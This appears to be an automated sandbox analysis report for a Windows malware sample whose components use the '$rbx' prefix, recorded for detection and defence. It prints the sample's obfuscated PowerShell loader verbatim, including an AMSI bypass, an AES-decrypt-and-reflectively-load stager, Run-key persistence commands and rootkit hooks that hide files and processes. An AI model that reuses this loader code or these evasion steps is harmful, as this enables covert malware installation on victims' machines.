Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Code function: 18_2_0000022123C21E3C LoadLibraryA,GetProcAddress,Sleep,

18_2_0000022123C21E3C

Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123C0A7DD push rcx; retf 003Fh	18_3_0000022123C0A7DE
Source: C:\Windows\System32\cmd.exe	Code function: 18_3_0000022123BDA7DD push rcx; retf 003Fh	18_3_0000022123BDA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 19_3_0000013F081DA7DD push rcx; retf 003Fh	19_3_0000013F081DA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B80B05C push esp; retf	35_2_00007FFD9B80B05D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B805EF7 push esp; retf	35_2_00007FFD9B805EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B8000AD pushad ; iretd	35_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 35_2_00007FFD9B8D79C9 push ebx; ret	35_2_00007FFD9B8D79CA
Source: C:\Windows\System32\conhost.exe	Code function: 36_3_000001FD1777A7DD push rcx; retf 003Fh	36_3_000001FD1777A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_0000017C6DA9A7DD push rcx; retf 003Fh	37_3_0000017C6DA9A7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_00000225DC62A7DD push rcx; retf 003Fh	38_3_00000225DC62A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_00000202C0ACA7DD push rcx; retf 003Fh	39_3_00000202C0ACA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 40_3_000002A6612EA7DD push rcx; retf 003Fh	40_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAEDDA7DD push rcx; retf 003Fh	41_3_000002BAAEDDA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 41_3_000002BAAEDAA7DD push rcx; retf 003Fh	41_3_000002BAAEDAA7DE
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 42_3_0000027052A2A7DD push rcx; retf 003Fh	42_3_0000027052A2A7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-U7ejKPED

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
